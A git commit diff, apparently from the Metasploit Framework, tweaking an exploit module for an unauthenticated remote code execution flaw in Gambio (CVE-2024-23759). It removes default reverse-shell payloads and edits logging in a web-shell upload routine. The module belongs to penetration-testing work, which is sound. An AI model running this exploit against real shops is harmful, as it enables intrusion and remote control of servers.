Apply suggestions from code review

jheysel-r7 · web-flow · commit 3205fe9e6396 · 2024-04-19T13:44:18.000-04:00
diff --git a/modules/exploits/multi/http/gambio_unauth_rce_cve_2024_23759.rb b/modules/exploits/multi/http/gambio_unauth_rce_cve_2024_23759.rb
@@ -46,21 +46,15 @@ def initialize(info = {})
             {
               'Platform' => ['php'],
               'Arch' => ARCH_PHP,
-              'Type' => :php,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
-              }
+              'Type' => :php
             }
           ],
           [
             'Unix Command',
             {
               'Platform' => ['unix', 'linux'],
               'Arch' => ARCH_CMD,
-              'Type' => :unix_cmd,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_bash'
-              }
+              'Type' => :unix_cmd
             }
           ],
           [
@@ -70,10 +64,7 @@ def initialize(info = {})
               'Arch' => [ARCH_X64, ARCH_X86],
               'Type' => :linux_dropper,
               'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'],
-              'Linemax' => 16384,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
-              }
+              'Linemax' => 16384
             }
           ],
         ],
@@ -164,7 +155,7 @@ def upload_webshell
       unless html.blank?
         country_tax_options = html.css('select[@id="country"]')
         country_tax_options.css('option').each do |country|
-          print_status("code: #{country['value']}")
+          vprint_status("Application's tax country code setting required for exploitation: #{country['value']}")
           res = send_request_cgi({
             'method' => 'POST',
             'uri' => normalize_uri(target_uri.path, 'shop.php?do=CreateGuest/Proceed'),
